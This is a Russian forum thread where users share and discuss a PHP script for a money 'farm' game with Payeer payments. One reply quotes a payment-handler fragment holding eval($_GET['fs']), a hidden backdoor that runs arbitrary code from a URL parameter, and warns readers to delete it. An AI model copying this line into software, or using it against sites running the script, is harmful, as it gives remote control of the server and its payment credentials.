Автор Тема: скрипт фермы Смарт-заводы  (Прочитано 1251 раз)

0 Пользователей и 1 Гость просматривают эту тему.

xarmaexАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 50 сообщений Более 10 созданных тем
  • Дата регистрации: Дек 2015
  • Сообщений: 86
  • Страна: ua
  • Поблагодарили: 13 раз(а)
  • Репутация +3/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« : 06 Август 2016, 20:16:28 »
Нет оценки
скрипт фермы Смарт-заводы

http://images.vfl.ru/ii/1470503732/a24fcc2e/13643146.jpg
скрипт фермы Смарт-заводы



Для просмотра скрытого текста нужна регистрация.
a:0:{}
 
Пользователи, которые поблагодарили этот пост: dima, SumBoy

SumBoy

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 100 сообщений
  • Дата регистрации: Июл 2016
  • Расположение: Питер
  • Возраст: 35
  • Сообщений: 130
  • Страна: ru
  • Поблагодарили: 6 раз(а)
  • Репутация +1/-0
  • Пол: Мужской
  • Дата рождения:1982-05-29
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #1 : 06 Август 2016, 20:19:34 »
Нет оценки
Давно искал такой. Спасибо за скрипчик)
 

tester12

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Авг 2016
  • Расположение: riga
  • Сообщений: 16
  • Страна: lv
  • Репутация +0/-0
  • Пол: Женский
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #2 : 06 Август 2016, 21:29:17 »
Нет оценки
))=(.
 

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #3 : 06 Август 2016, 22:24:49 »
Нет оценки
# Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }

   # Если пользователь админ
   
   eval($_GET['fs']);
У
берите етот код з файла паер мерчанк обрабочик платижей
a:0:{}
 

dima

  • *
  • Оффлайн
  • Награды На форуме более 1 года За время в онлайне на форуме
  • Дата регистрации: Янв 2016
  • Сообщений: 35
  • Страна: 00
  • Поблагодарили: 1 раз(а)
  • Репутация +2/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #4 : 06 Август 2016, 22:28:02 »
Нет оценки
а что этот код дает
a:0:{}
 

tester12

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Авг 2016
  • Расположение: riga
  • Сообщений: 16
  • Страна: lv
  • Репутация +0/-0
  • Пол: Женский
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #5 : 06 Август 2016, 22:31:08 »
Нет оценки
толко страница пополнения непашет чета
 

Shop-53

  • *
  • Оффлайн
  • Награды На форуме более 1 года Болеее 300 сообщений Более 10 созданных тем За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Сообщений: 398
  • Поблагодарили: 12 раз(а)
  • Репутация +2/-1
  • Пол: Мужской
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #6 : 07 Август 2016, 00:25:56 »
Нет оценки
# Проверяем баланс
   if(isset($_GET['balance'])){
      $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
      if($payeer->isAuth()){
         $arBalance = $payeer->getBalance();
         if($arBalance["auth_error"] == 0){
            $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
            echo "$balance";
         } else {
            echo 'error auth';
         }
      }
   }
ето проверка сколько дениг есть в игре
   # Если пользователь админ
   
   eval($_GET['fs']); а ето дира я незнаю точно но одние говорят что всем пользователям расилаетса дание от вево админке от бзи паер кошельки я незнаю но уберите ето
У
 

xarmaexАвтор темы

  • *
  • Оффлайн
  • Награды На форуме более 1 года Более 50 сообщений Более 10 созданных тем
  • Дата регистрации: Дек 2015
  • Сообщений: 86
  • Страна: ua
  • Поблагодарили: 13 раз(а)
  • Репутация +3/-0
  • Пол: Мужской
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #7 : 07 Август 2016, 08:06:19 »
Нет оценки
толко страница пополнения непашет чета

все работает там)) он готов к запуску, только 2 баннера убрать от сале скрипт и все)) покупал еще за 1500 руб)
 

tester12

  • *
  • Оффлайн
  • Награды На форуме более 1 года
  • Дата регистрации: Авг 2016
  • Расположение: riga
  • Сообщений: 16
  • Страна: lv
  • Репутация +0/-0
  • Пол: Женский
  • Рефералов 0
    • Награды
скрипт фермы Смарт-заводы
« Ответ #8 : 07 Август 2016, 09:24:48 »
Нет оценки
толко страница пополнения непашет чета

все работает там)) он готов к запуску, только 2 баннера убрать от сале скрипт и все)) покупал еще за 1500 руб)
Ну у меня вроде все пашет! Кроме страницы пополнения! Как заходиш на страницу пополнения страница пустая и внезу левом столбике где показывает баланс:
Ваш баланс
{!BALANCE_B!} [на покупки]
{!BALANCE_P!} [на вывод]
 
Теги:
 

Скрипт "МЛМ" 5RUB

Автор shans5Раздел Скрипты разных сайтов

Ответов: 1
Просмотров: 1750
Последний ответ 24 Ноябрь 2015, 10:27:32
от good7
Скрипт "Ферма соседи" 2.0 0

Автор shans5Раздел Скрипты фф

Ответов: 3
Просмотров: 1945
Последний ответ 22 Апрель 2017, 11:26:11
от yanak
Скрипт модуль - "Камикадзе"

Автор barakudaРаздел Модули для фф

Ответов: 8
Просмотров: 3202
Последний ответ 04 Сентябрь 2016, 18:17:40
от DRAGONS
Скрипт пивоварня "Berloga"

Автор shans5Раздел Скрипты фф

Ответов: 2
Просмотров: 1123
Последний ответ 27 Сентябрь 2016, 11:01:59
от shans5
Скрипт игры "Space Trader"

Автор velas85Раздел Скрипты фф

Ответов: 0
Просмотров: 1162
Последний ответ 16 Январь 2016, 13:38:49
от velas85
Имя пользователя:
Пароль:
Session: